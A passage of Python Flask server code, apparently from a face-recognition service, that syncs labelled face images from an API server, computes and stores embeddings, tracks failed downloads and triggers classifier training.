TrainSet.query.filter_by(url=img_url, group_id=group_id).update(dict(filepath=filepath))
db.session.commit()
def check_image_valid(filepath):
if filepath is None:
return False
if not os.path.exists(filepath):
print("not found {}".format(filepath))
return False
if os.path.getsize(filepath) < 1:
print("invalid file size {}".format(filepath))
return False
return True
def downloadTrainDatasets(result, group_id):
failedDownloadedItems = []
img_path = None
embedding_path = None
try:
for person in result:
faceId = person.get("faceId")
urls = person.get("urls")
print('--> {}'.format(faceId))
for url in urls:
#print(' {}'.format(url))
# url,faceid 从点圈群相册获取
# todo 可以用for循环解析群相册获取的json数据
img_url = url['url']
faceid = faceId
style = url['style']
if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
else:
if style == 'left_side' or style == 'right_side' or style == 'lower_head' or style == 'blury':
continue
else:
style = 'front'
#status, embedding = down_img_embedding(img_url, group_id, faceid, style=style)
print('img_url: ', img_url)
img_path = save_embedding.get_image_path(img_url, group_id, faceId, style)
print("img_path = {}".format(img_path))
embedding_path = save_embedding.get_embedding_path(img_path)
print("embedding_path = {}".format(embedding_path))
denoise_path = save_embedding.get_image_denoise_path(img_path)
recreate_embedding = False
embedding = None
if not os.path.exists(img_path):
print('img-path not exists ----- ')
img_path = save_embedding.download_img_for_svm(img_url, group_id, faceId, style)
if img_path and check_image_valid(img_path):
if not os.path.exists(denoise_path):
img = misc.imread(os.path.expanduser(img_path))
save_embedding.save_image_denoise(img, denoise_path)
recreate_embedding = True
if os.path.exists(denoise_path) is True and check_image_valid(denoise_path) is False:
os.remove(embedding_path)
os.remove(denoise_path)
recreate_embedding = False
continue
if not os.path.exists(embedding_path) or recreate_embedding == True:
img = misc.imread(os.path.expanduser(denoise_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
print('......')
print('img_path: ',img_path)
embedding = featureCalculation2(img_path)
print('----------')
#embedding = featureCalculation(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
#print("1, type(embedding)={}".format(type(embedding)))
else:
embedding_path = save_embedding.get_embedding_path(img_path)
embedding = save_embedding.read_embedding_string(embedding_path)
embedding = np.asarray(embedding)
recover_db(img_url, group_id, faceid, img_path, embedding, style=style)
#print('-> downloadTrainDatasets downloaded url {} to {}'.format(url['url'], img_path))
else:
if img_path is not None and os.path.exists(img_path):
os.remove(img_path)
failedDownloadedItems.append(person)
except Exception as ex:
print('downloadTrainDatasets: except:', ex)
if img_path and os.path.isfile(img_path):
print('downloadTrainDatasets: Remove image from local {}'.format(img_path))
os.remove(img_path)
if embedding_path and os.path.isfile(embedding_path):
print('downloadTrainDatasets: Remove embedding from local {}'.format(embedding_path))
os.remove(embedding_path)
return failedDownloadedItems
def disposeFinalSyncDatasetsThreadFunc(device_id, toid):
invalid_images_onserver = 0
try:
group_id = get_current_groupid()
#host="http://localhost:3000/restapi/datasync/token/" + str(group_id)
API_SERVER_ADDRESS = os.getenv('API_SERVER_ADDRESS','workaihost.tiegushi.com')
API_SERVER_PORT = os.getenv('API_SERVER_PORT','80')
host = 'http://'+API_SERVER_ADDRESS+':'+API_SERVER_PORT+'/restapi/datasync/token/' + str(group_id)
result = None
try:
response = urlopen(host, timeout=10)
except HTTPError as e:
print('HTTPError: ', e.code)
return False
except URLError as e:
print('URLError: ', e.reason)
return False
except Exception as e:
print('Error: ', e)
return False
else:
# everything is fine
if 200 == response.getcode():
result = response.readline()
#print(result)
result = json.loads(result)
failedDownloadedItems = downloadTrainDatasets(result, group_id)
try_count = 0
while len(failedDownloadedItems) > 0:
try_count = try_count+1
print("len(failedDownloadedItems) = {}, try_count={}".format(len(failedDownloadedItems), try_count))
if try_count > 3:
print("We have tried 3 times to download the training dataset.")
break
failedDownloadedItems = downloadTrainDatasets(failedDownloadedItems, group_id)
#Remove invalid data from local DB
urlsInLocalDB = TrainSet.query.filter_by(group_id=group_id).all()
urlsOnServer = dict()
for person in result:
faceId = person.get("faceId")
urls = person.get("urls")
for url in urls:
img_url = url['url']
faceid = faceId
style = url['style']
if style == 'left_side' or style == 'right_side' or style == 'lower_head' or style == 'blury':
invalid_images_onserver += 1
continue
urlsOnServer[img_url] = group_id, faceId, style
print("Trainsets: len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
print("Trainsets: len(urlsOnServer) = {}".format(len(urlsOnServer)))
urlsTemp = {}
deleteUrlsInLocalDB = []
if urlsInLocalDB:
for item in urlsInLocalDB:
image_path = None
#print("item = {}, item.url={}".format(item, item.url))
if (item.url in urlsTemp and urlsTemp[item.url] == 1) or item.url not in urlsOnServer.keys():
print("{}, {}, {}, {} is not on server, delete it from local DB.".format(item.url, item.group_id, item.face_id, item.style))
deleteUrlsInLocalDB.append(item)
if item.filepath:
image_path = item.filepath
db.session.delete(item)
db.session.commit()
if image_path and os.path.isfile(image_path):
print('Remove image from local {}'.format(image_path))
os.remove(image_path)
embedding_path = save_embedding.get_embedding_path(image_path)
if embedding_path and os.path.isfile(embedding_path):
print('Remove embedding from local {}:'.format(embedding_path))
os.remove(embedding_path)
urlsTemp[item.url] = 1
if len(deleteUrlsInLocalDB) > 0:
for item in deleteUrlsInLocalDB:
urlsInLocalDB.remove(item)
urlsTemp = None
print("Trainsets: 2, len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
print("Trainsets: 2, len(urlsOnServer) = {}".format(len(urlsOnServer)))
#Remove invalid photos from local
dataset = []
style = ''
# if SVM_TRAIN_WITHOUT_CATEGORY is True:
# style = 'front'
style = 'front'
path = os.path.dirname(os.path.dirname(save_embedding.get_image_path('http://test/noname', group_id, faceId, style)))
# style = ''
# if SVM_TRAIN_WITHOUT_CATEGORY is True:
# style = 'front'
print("path={}".format(path)) #Frank
path_exp = os.path.expanduser(path)
classes = [path for path in os.listdir(path_exp) \
if os.path.isdir(os.path.join(path_exp, path))]
classes.sort()
nrof_classes = len(classes)
#print("classes={}".format(classes)) #Frank
for i in range(nrof_classes):
class_name = classes[i]
if USE_DEFAULT_DATA is True:
if class_name == "groupid_defaultfaceid":
continue;
facedir = os.path.join(path_exp, class_name)
image_paths = []
print("facedir={}".format(facedir))
if os.path.isdir(facedir):
images = os.listdir(facedir)
for img in images:
dataset.append(os.path.join(facedir,img))
willRemoveCount = 0
print("len(dataset)={}".format(len(dataset))) #Frank
#print("dataset={}".format(dataset))
#print("urlsInLocalDB={}".format(urlsInLocalDB))
if len(dataset) > 0:
for image_path in dataset:
l5 = (item for item in urlsInLocalDB if item.filepath.replace('front/','') == image_path.replace('front/',''))
count = sum(1 for x in l5)
if count == 0:
print("sum={}".format(count))
willRemoveCount = willRemoveCount+1
print("image_path({}) only in local, remove it.".format(image_path))
if image_path and os.path.exists(image_path):
os.remove(image_path)
print("Remove image_path={}".format(image_path))
embedding_path = save_embedding.get_embedding_path(image_path)
if embedding_path and os.path.isfile(embedding_path):
os.remove(embedding_path)
if len(device_id) > 1 and len(toid) > 1:
message = 'image_path({}) only in local, remove it.'.format(image_path)
print(message)
sendMessage2Group(device_id, toid, message)
if len(device_id) > 1 and len(toid) > 1:
message = 'Stat: localDB={}, server={}/{}, localfiles={}'.format(len(urlsInLocalDB), len(urlsOnServer), invalid_images_onserver, len(dataset)-willRemoveCount)
print(message)
sendMessage2Group(device_id, toid, message)
return True
else:
print('response code != 200')
return False
except Exception as ex:
print('disposeFinalSyncDatasetsThreadFunc: except:', ex)
def disposeSyncStatusInfoThreadFunc(device_id, toid):
invalid_images_onserver = 0
try:
group_id = get_current_groupid()
#host="http://localhost:3000/restapi/datasync/token/" + str(group_id)
API_SERVER_ADDRESS = os.getenv('API_SERVER_ADDRESS','workaihost.tiegushi.com')
API_SERVER_PORT = os.getenv('API_SERVER_PORT','80')
host = 'http://'+API_SERVER_ADDRESS+':'+API_SERVER_PORT+'/restapi/datasync/token/' + str(group_id)
result = None
try:
response = urlopen(host, timeout=10)
except HTTPError as e:
print('HTTPError: ', e.code)
return False
except URLError as e:
print('URLError: ', e.reason)
return False
except Exception as e:
print('Error: ', e)
return False
else:
# everything is fine
if 200 == response.getcode():
result = response.readline()
#print(result)
result = json.loads(result)
#Remove invalid data from local DB
urlsInLocalDB = TrainSet.query.filter_by(group_id=group_id).all()
urlsOnServer = dict()
for person in result:
faceId = person.get("faceId")
urls = person.get("urls")
for url in urls:
img_url = url['url']
faceid = faceId
style = url['style']
if style == 'left_side' or style == 'right_side' or style == 'lower_head' or style == 'blury':
invalid_images_onserver += 1
continue
urlsOnServer[img_url] = group_id, faceId, style
print("Trainsets: len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
print("Trainsets: len(urlsOnServer) = {}".format(len(urlsOnServer)))
#Remove invalid photos from local
dataset = []
# style = ''
# if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
path = os.path.dirname(os.path.dirname(save_embedding.get_image_path('http://test/noname', group_id, faceId, style)))
style = ''
if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
print("path={}".format(path)) #Frank
path_exp = os.path.expanduser(path)
classes = [path for path in os.listdir(path_exp) \
if os.path.isdir(os.path.join(path_exp, path))]
classes.sort()
nrof_classes = len(classes)
#print("classes={}".format(classes)) #Frank
for i in range(nrof_classes):
class_name = classes[i]
facedir = os.path.join(path_exp, class_name)
image_paths = []
print("facedir={}".format(facedir))
if os.path.isdir(facedir):
images = os.listdir(facedir)
for img in images:
dataset.append(os.path.join(facedir,img))
if len(device_id) > 1 and len(toid) > 1:
message = 'StatInfo: localDB={}, server={}/{}, localfiles={}'.format(len(urlsInLocalDB), len(urlsOnServer), invalid_images_onserver, len(dataset))
print(message)
sendMessage2Group(device_id, toid, message)
return True
else:
print('response code != 200')
return False
except Exception as ex:
print('disposeSyncStatusInfoThreadFunc: except:', ex)
# @app.before_first_request
def migration():
if os.path.exists('migrate_db.exe'):
out_put = subprocess.check_output(['./migrate_db.exe', 'db', 'upgrade'])
else:
out_put = subprocess.check_output(['python', 'migrate_db.py', 'db', 'upgrade'])
print(out_put)
print('> finish migrate upgrade')
@app.route('/api/status', methods=['GET'])
def get_status():
global isUpdatingDataSet
if isUpdatingDataSet is False:
resp = Response(json.dumps({"status":"alive"}), status=200, mimetype='application/json')
else:
resp = Response(json.dumps({"status":"busy"}), status=401, mimetype='application/json')
return resp
@app.route('/api/images/<filename>', methods=['GET'])
def img(filename):
# p = People.query.filter_by(filename=filename).first()
# if p and p.aliyun_url:
# return redirect(p.aliyun_url)
if os.path.isfile(os.path.join(app.config['UPLOAD_FOLDER'], filename)):
# 返回图片
return send_from_directory(app.config['UPLOAD_FOLDER'],
filename)
# 返回json
# data = {'img_name': filename, 'img_url': request.url}
# js = json.dumps(data)
# resp = Response(js, status=200, mimetype='application/json')
# return resp
else:
return abort(404)
def format_img_filename(old_filename):
"""
给文件名加上gFlask_port,防止重名
:param old_filename: 旧文件名
:return: new_filename, uuid, ts
"""
ext = old_filename.rsplit('.', 1)[-1]
unix_time = time.time()
uuid = request.args.get('uuid', '')
ts = request.args.get('ts', str(unix_time * 1000))
new_filename = uuid + '_' + str(gFlask_port) + '_' + str(unix_time).replace('.', '') + '_' + str(ts) + '.' + ext
return new_filename, uuid, ts
@app.route('/api/upload_video/', methods=['POST'])
def upload_video():
video_local_path = request.form.get('videopath')
thumbnail_local_path = request.form.get('thumbnail', '')
ts = int(time.time()*1000) # 时间戳
offset = time.timezone if (time.localtime().tm_isdst == 0) else time.altzone
ts_offset = offset/60/60 * -1 # 时区 8
uuid = request.args.get('uuid', '')
key = uuid + str(ts)
video_src = qiniu_upload_video(key+'video', video_local_path) # 上传本地视频,获取视频播放地址
video_post = qiniu_upload_img(key+'thumbnail', thumbnail_local_path) # 视频封面预览图地址
person_id = request.args.get('objid', '')
if len(video_post) < 1:
video_post = 'http://data.tiegushi.com/fTnmgpdDN4hF9re8F_1493176458747.jpg';
payload = {'uuid': uuid,
'person_id': person_id,
'video_post': video_post,
'video_src': video_src,
'ts': ts,
'ts_offset': ts_offset,
}
post2gst_video(payload)
print('upload_video'.center(50,'-'))
print(payload)
return Response(json.dumps({"result": "ok"}), status=200, mimetype='application/json')
def sendDebugLogToGroup(uuid, current_groupid, message):
if ENABLE_DEBUG_LOG_TO_GROUP is True:
sendMessage2Group(uuid, current_groupid, message)
def showRecognizedImage(image_path, queue_index):
if os.path.exists(image_path):
recognized_img_path = os.path.join(os.path.dirname(image_path), 'face{}.png'.format(queue_index))
shutil.copy(image_path, recognized_img_path)
FACE_COUNT = defaultdict(int)
OBJ_COUNT = 0
def updateDataSet(url, objId, group_id, device_id, drop, img_type, sqlId, style, img_ts, rm_reason):
isUpdatingDataSet = True
try:
_updateDataSet(url, objId, group_id, device_id, drop, img_type, sqlId, style, img_ts, rm_reason)
except Exception as ex:
print("updateDataSet error:", ex)
isUpdatingDataSet = False
#raise
isUpdatingDataSet = False
FAILEDDOWNLOADINFOFILE = os.path.join(BASEDIR, 'failed_download_info.json')
FAILEDDOWNLOADINFOFILE2 = os.path.join(BASEDIR, 'failed_download_info2.json')
fileMuxlock = threading.Lock()
def loadFailedDownloadInfo():
failedDownloadInfo = {}
failedDownloadInfo['dInfo'] = []
if (os.path.isfile(FAILEDDOWNLOADINFOFILE)):
with open(FAILEDDOWNLOADINFOFILE) as fJson:
failedDownloadInfo = json.load(fJson)
return failedDownloadInfo
def recordFailedDownload(url, group_id, face_id, style, device_id):
failedDownloadInfo = loadFailedDownloadInfo()
failedDownloadInfo['dInfo'].append({
'url': url,
'group_id': group_id,
'face_id': face_id,
'style': style,
'device_id': device_id
})
with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
json.dump(failedDownloadInfo, fJson)
def loadFailedDownloadList(filepath):
failedDownloadInfo = {}
failedDownloadInfo['dInfo'] = []
if (os.path.isfile(filepath)):
with open(filepath) as fJson:
failedDownloadInfo = json.load(fJson)
return failedDownloadInfo
def addFailedDownloadInfo(url, group_id, face_id, style, device_id):
fileMuxlock.acquire()
failedDownloadInfo = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE2)
failedDownloadInfo['dInfo'].append({
'url': url,
'group_id': group_id,
'face_id': face_id,
'style': style,
'device_id': device_id
})
print('addFailedDownloadInfo: url='+url)
with open(FAILEDDOWNLOADINFOFILE2, 'w') as fJson:
json.dump(failedDownloadInfo, fJson)
fileMuxlock.release()
def mergeTwoJsonFiles():
fileMuxlock.acquire()
failedDownloadInfo1 = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE)
failedDownloadInfo2 = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE2)
mergedJson = {key: value for (key, value) in (failedDownloadInfo1.items() + failedDownloadInfo2.items())}
if (len(mergedJson['dInfo']) > 0):
print('mergeTwoJsonFiles: mergedJson=')
for key, value in mergedJson.items():
print(key, ':', value)
with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
json.dump(mergedJson, fJson)
if (os.path.isfile(FAILEDDOWNLOADINFOFILE2)):
os.remove(FAILEDDOWNLOADINFOFILE2)
fileMuxlock.release()
def mergeFailedDownloadInfo(json1):
fileMuxlock.acquire()
failedDownloadInfo = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE2)
mergedJson = {key: value for (key, value) in (json1.items() + failedDownloadInfo.items())}
if (len(mergedJson['dInfo']) > 0):
print('mergeFailedDownloadInfo: mergedJson=')
for key, value in mergedJson.items():
print(key, ':', value)
with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
json.dump(mergedJson, fJson)
if (os.path.isfile(FAILEDDOWNLOADINFOFILE2)):
os.remove(FAILEDDOWNLOADINFOFILE2)
fileMuxlock.release()
def downloadFunc():
global FACE_COUNT
global OBJ_COUNT
while True:
try:
tmpFailedDownloadInfo = {}
tmpFailedDownloadInfo['dInfo'] = []
mergeTwoJsonFiles()
failedDownloadInfo = loadFailedDownloadList(FAILEDDOWNLOADINFOFILE)
for info in failedDownloadInfo['dInfo']:
if SVM_TRAIN_WITHOUT_CATEGORY is True:
info['style'] = 'front'
img_path = save_embedding.get_image_path(info['url'], info['group_id'], info['face_id'], info['style'])
embedding_path = save_embedding.get_embedding_path(img_path)
denoise_path = save_embedding.get_image_denoise_path(img_path)
recreate_embedding = False
if not os.path.exists(img_path):
img_path = save_embedding.download_img_for_svm(info['url'], info['group_id'], info['face_id'], style=info['style'])
if img_path:
if not os.path.exists(denoise_path):
img = misc.imread(os.path.expanduser(img_path))
save_embedding.save_image_denoise(img, denoise_path)
recreate_embedding = True
if not os.path.exists(embedding_path) or recreate_embedding == True:
img = misc.imread(os.path.expanduser(denoise_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
embedding = featureCalculation(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
old_train_set = TrainSet.query.filter_by(url=info['url'], group_id=info['group_id'], is_or_isnot=True, style=info['style']).first()
if not old_train_set:
train = TrainSet(url=info['url'], group_id=info['group_id'], is_or_isnot=True,
device_id=info['device_id'], face_id=info['face_id'], filepath=img_path, drop=False, style=info['style'])
db.session.add(train)
db.session.commit()
FACE_COUNT[info['style']] += 1
print('-> SVM {} style face count'.format((FACE_COUNT[info['style']])))
else:
tmpFailedDownloadInfo['dInfo'].append({info})
if (len(tmpFailedDownloadInfo['dInfo']) > 0):
mergeFailedDownloadInfo(tmpFailedDownloadInfo)
#with open(FAILEDDOWNLOADINFOFILE, 'w') as fJson:
# json.dump(failedDownloadInfo, fJson)
elif (os.path.isfile(FAILEDDOWNLOADINFOFILE)):
os.remove(FAILEDDOWNLOADINFOFILE)
except Exception as ex:
print('except:', ex)
time.sleep(5)
tDownload = threading.Thread(target=downloadFunc)
tDownload.daemon = True
tDownload.start()
def dropPersonFunc(group_id, face_id, drop_person):
print('dropPersonFunc, group_id:', group_id, 'face_id:', face_id, 'drop_person:', drop_person)
try:
if drop_person == 'true' or drop_person == 'True' or drop_person == True:
with app.app_context():
train_set = TrainSet.query.filter_by(group_id=group_id, face_id=face_id).all()
dirname = None
for t in train_set:
print('delete db, group_id:', group_id, 'face_id:', face_id, 'url:', t.url)
if t.filepath:
dirname = t.filepath
db.session.delete(t)
db.session.commit()
if dirname:
dirname = dirname.rsplit('/', 1)[0]
print('dropPerson, remove dir:', dirname)
shutil.rmtree(dirname, ignore_errors=True)
except Exception as ex:
print('dropPersonFunc ex:', ex)
def generate_embedding_ifmissing(data_dir):
if not os.path.exists(data_dir):
print("generate_embedding_ifmissing: data_dir is not exists! Please check it.")
dataset = facenet.get_dataset(data_dir)
paths, labels = facenet.get_image_paths_and_labels(dataset)
nrof_images = len(paths)
for i in range(nrof_images):
img_path = paths[i]
embedding_path = save_embedding.get_embedding_path(img_path)
denoise_path = save_embedding.get_image_denoise_path(img_path)
print("denoise_path={}".format(denoise_path))
recreate_embedding = False
if not os.path.exists(denoise_path):
img = misc.imread(os.path.expanduser(img_path))
save_embedding.save_image_denoise(img, denoise_path)
recreate_embedding = True
if not os.path.exists(embedding_path) or recreate_embedding == True:
embedding = featureCalculation2(denoise_path)
save_embedding.create_embedding_string(embedding, embedding_path)
print("Create missing embedding file: {}".format(embedding_path))
def check_default_data(group_id, style):
"""
default_data is face data for SVM training. SVM training need at least two classes.
Check if there is default data. If not, add default data.
:param group_id:
:param style:
:return:
"""
group_path = os.path.join(save_embedding.BASEPATH, group_id, style, save_embedding.img_dir)
'''
class_list = os.listdir(group_path)
for one_class in class_list:
class_id = one_class.split('_')[-1]
# FIXME : Probably need to check all the files for default. Not just existence of image directory
if class_id == 'default':
return
'''
# Copy default face data
default_dir_path = os.path.join(group_path, 'groupid_defaultfaceid')
if not os.path.exists(default_dir_path):
os.mkdir(default_dir_path)
img_path = os.path.join(default_dir_path, 'default_face.png')
if not os.path.isfile(img_path):
default_data_path = os.path.join(BASEDIR, 'faces', 'default_data', 'default_face.png')
shutil.copy(default_data_path, default_dir_path)
# Generate denoise and embedding for default data
img = misc.imread(os.path.expanduser(img_path))
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
'''
denoise_path = save_embedding.get_image_denoise_path(img_path)
save_embedding.save_image_denoise(aligned, denoise_path)
'''
embedding_path = save_embedding.get_embedding_path(img_path)
if not os.path.isfile(embedding_path):
embedding = featureCalculation2(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
#updateDataSet(url=url, objId=face_id, group_id=group_id,drop=drop)
def _updateDataSet(url, objId, group_id, device_id, drop, img_type, sqlId, style, img_ts, rm_reason):
print("> MQTT url:{}, objId:{}, drop:{}, gid:{}, sqlId:{}, style:{}, rm_reason:{}".format(url, objId, drop,
group_id, sqlId, style, rm_reason))
face_id = str(objId)
if style is None:
print('Need to update client app !')
return
styles = style.split('|') # 如 ['left', 'rigth']
global FACE_COUNT
global OBJ_COUNT
print("> MQTT2 url:{}, objId:{}, drop:{}, gid:{}, sqlId:{}, style:{}, rm_reason:{}, group_id:{}, drop:{}, img_type:{}".format(url, objId, drop,
group_id, sqlId, style, rm_reason, group_id, drop, img_type))
if (url is None) or (objId is None) or (group_id is None) or (drop is None) or (img_type is None):
return
if (len(url) < 1) or (len(objId) < 1) or (len(group_id) < 1) or (len(img_type) < 1):
return
if EN_OBJECT_DETECTION is False and img_type == 'object':
return
with app.app_context():
#人脸: 未识别的图片点"删除"/合并的图片点"错"及点"删除", 在这里判断
if img_type == 'face' and sqlId is not None and (drop == 'true' or drop == 'True' or drop == True):
current_dirty_in_db = People.query.filter_by(aliyun_url=url, group_id=group_id).all()
old_dirty_in_db = People.query.filter_by(id=sqlId, uuid=device_id).all()
for d in old_dirty_in_db:
#old_dirty_in_db 是最开始new people时候存的的对比数据
print("remove origin dirty embedding url={}".format(d.aliyun_url))
db.session.delete(d)
db.session.commit()
for t in current_dirty_in_db:
if rm_reason is not None and rm_reason == "notface":
t.classId = "notface"
db.session.add(t)
db.session.commit()
print("update None-face image 1")
continue
#删除当前图片
print("remove current dirty embedding sqlId={}".format(sqlId))
db.session.delete(t)
db.session.commit()
#if SVM_CLASSIFIER_ENABLED is False:
for style in styles:
if style == 'dirty' or style == 'low_pixel' or style == 'blury':
continue
train_set = TrainSet.query.filter_by(url=url, group_id=group_id, style=style).all()
people_in_db = People.query.filter_by(group_id=group_id, aliyun_url=url).all()
if drop == 'true' or drop == 'True' or drop is True:
print(rm_reason)
if len(people_in_db) == 0 and rm_reason is not None and rm_reason == "notface":
print("insert not face image into people db")
url_tmp=url.split('/')
if len(url_tmp) > 0:
imgfilepath = save_embedding.download_img_only(url, 'tempdir')
insertOneImageIntoPeopleDB(imgfilepath, device_id, group_id, objId, url, notFace=True, style=style)
for t in train_set:
t.drop = True
db.session.delete(t)
db.session.commit()
#db.session.delete(t)
#delete the train image
filepath = t.filepath
print('drop train_set db:', filepath)
if filepath and os.path.exists(filepath):
os.remove(filepath)
for t in people_in_db:
if rm_reason is not None and rm_reason == "notface":
t.classId = "notface"
db.session.add(t)
db.session.commit()
print("update None-face image 2")
continue
print('drop people_in_db db & filepath:')
db.session.delete(t)
db.session.commit()
# labeled_img[person_id].remove(url)
else:
embedding = None
if len(people_in_db) == 0:
print("insert into people db")
url_tmp=url.split('/')
if len(url_tmp) > 0:
imgfilepath = save_embedding.download_img_only(url, 'tempdir')
embedding = insertOneImageIntoPeopleDB(imgfilepath, device_id, group_id, objId, url, notFace=False, style=style)
else:
for t in people_in_db:
print('update people_in_db classId %s as %s' %(t.classId, objId))
t.classId = objId
db.session.add(t)
db.session.commit()
old_train_set = TrainSet.query.filter_by(url=url, group_id=group_id, is_or_isnot=True, style=style).first()
print("old_train_set: {}, {}".format(old_train_set, url))
if not old_train_set:
print("insert one in db")
if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
train = TrainSet(url=url, group_id=group_id, is_or_isnot=True,
device_id=device_id, face_id=face_id, filepath='', drop=False, style=style)
db.session.add(train)
db.session.commit()
if img_type == 'object' and EN_OBJECT_DETECTION is True:
infile = gbottlenecks.downloadImg(url, group_id, face_id, train.id)
print(infile) # 原图路径
resize(infile)
os.remove(infile) # 保存resized的图片,删除原图
gbottlenecks.createAndCacheBottlenecks()
OBJ_COUNT += 1
train.filepath = infile
elif SVM_CLASSIFIER_ENABLED is True:
img_path = save_embedding.download_img_for_svm(url, group_id, face_id, style=style)
if img_path:
img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
denoise_path = save_embedding.get_image_denoise_path(img_path)
save_embedding.save_image_denoise(aligned, denoise_path)
embedding = featureCalculation2(denoise_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
train.filepath = img_path
print('-> insert: SVM {} style face count, url={}'.format((FACE_COUNT[style]), url))
else:
print('download failed, save to json file for future download: url={}'.format(url))
#recordFailedDownload(url, group_id, face_id, style, device_id)
addFailedDownloadInfo(url, group_id, face_id, style, device_id)
else:
print('face')
# 人脸训练过程:标注人脸 > 下载人脸对应URL图片 > 保存对应embedding并转换 > 训练
img_path = save_embedding.download_img(url, group_id, face_id, img_id=train.id, style=style)
img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
embedding = featureCalculation2(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
train.filepath = img_path
print('{} style face count'.format((FACE_COUNT[style])))
db.session.add(train)
db.session.commit()
elif old_train_set and old_train_set.face_id != face_id:
print("update one in db, url={}".format(url))
if old_train_set.drop == True:
print("this url is droped")
return
# url中的face不是 xxx
if SVM_TRAIN_WITHOUT_CATEGORY is True:
style = 'front'
old_train_set.is_or_isnot = False
db.session.add(old_train_set)
db.session.commit()
# url中的face是 xxx
new_train_set = TrainSet(url=url, group_id=group_id, is_or_isnot=True, device_id=device_id,
face_id=face_id, style=style)
db.session.add(new_train_set)
db.session.commit()
if img_type == 'object' and EN_OBJECT_DETECTION is True:
infile = gbottlenecks.downloadImg(url, group_id, face_id, new_train_set.id)
resize(infile)
os.remove(infile) # 保存resized的图片,删除原图
gbottlenecks.createAndCacheBottlenecks()
OBJ_COUNT += 1
# 这里需要把老图从本地目录删除掉
old_img_path = infile.replace(str(new_train_set.id)+'.jpg', str(old_train_set.id)+'.jpg')
os.remove(old_img_path)
elif SVM_CLASSIFIER_ENABLED is True:
img_path = save_embedding.download_img_for_svm(url, group_id, face_id, style=style)
if img_path:
denoise_path = save_embedding.get_image_denoise_path(img_path)
recreate_embedding = False
if not os.path.exists(denoise_path):
img = misc.imread(os.path.expanduser(img_path))
save_embedding.save_image_denoise(img, denoise_path)
recreate_embedding = True
embedding_path = save_embedding.get_embedding_path(img_path)
if os.path.isfile(embedding_path) is False:
#img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
#aligned = misc.imresize(img, (image_size, image_size))
#misc.imsave(img_path, aligned)
if embedding is None:
embedding = featureCalculation(denoise_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
print('update: {} style face count, url={}'.format(FACE_COUNT[style], url))
# 这里需要把老图从本地目录删除掉
old_img_path = img_path.replace(str(new_train_set.id) + '.jpg', str(old_train_set.id) + '.jpg')
os.remove(old_img_path)
else:
print('face')
img_path = save_embedding.download_img(url, group_id, face_id, img_id=new_train_set.id, style=style)
#img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
#aligned = misc.imresize(img, (image_size, image_size))
#misc.imsave(img_path, aligned)
embedding = featureCalculation(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
FACE_COUNT[style] += 1
print('{} style face count'.format((FACE_COUNT[style])))
# 这里需要把老图从本地目录删除掉
old_img_path = img_path.replace(str(new_train_set.id) + '.jpg', str(old_train_set.id) + '.jpg')
os.remove(old_img_path)
else:
print("already in dataset")
if USE_DEFAULT_DATA is True:
check_default_data(group_id, style)
if img_type == 'object':
# all_dataset = TrainSet.query.filter_by(group_id=group_id, face_id=face_id, is_or_isnot=True).all()
# cnt = TrainSet.query.filter_by(group_id=group_id, face_id=face_id, is_or_isnot=True).count()
if OBJ_COUNT > 0 and OBJ_COUNT % 20 == 0:
#sendMessage2Group(device_id, group_id, "Training now ...")
clean_droped_embedding(group_id)
print("training now ...")
if os.path.exists('objects/train_obj.exe'):
os.system("./objects/train_obj.exe {} {}".format(deviceId, group_id))
elif os.path.exists('objects/train_obj.pyc'):
os.system("python objects/train_obj.pyc {} {}".format(deviceId, group_id))
else:
os.system("python objects/train_obj.py {} {}".format(deviceId, group_id))
else:
current_groupid = get_current_groupid()
if SVM_CLASSIFIER_ENABLED is True and FACE_COUNT[style] > 0 and FACE_COUNT[style] % 10 == 0:
# #http://sharats.me/the-ever-useful-and-neat-subprocess-module.html
# #https://stackoverflow.com/questions/2837214/python-popen-command-wait-until-the-command-is-finished
if mqttc is not None:
mqttc.train_svm(device_id, current_groupid, "Auto training triggered ...")
'''
clean_droped_embedding(current_groupid)
svm_current_groupid_basepath = os.path.join('data', 'faces', current_groupid)
if len(device_id) > 1 and len(current_groupid) > 1:
sendMessage2Group(device_id, current_groupid, "Auto training triggered ...")
stime = time.time()
# for style in ['left_side', 'right_side', 'front']:
for style in ['front']:
#style = 'front'
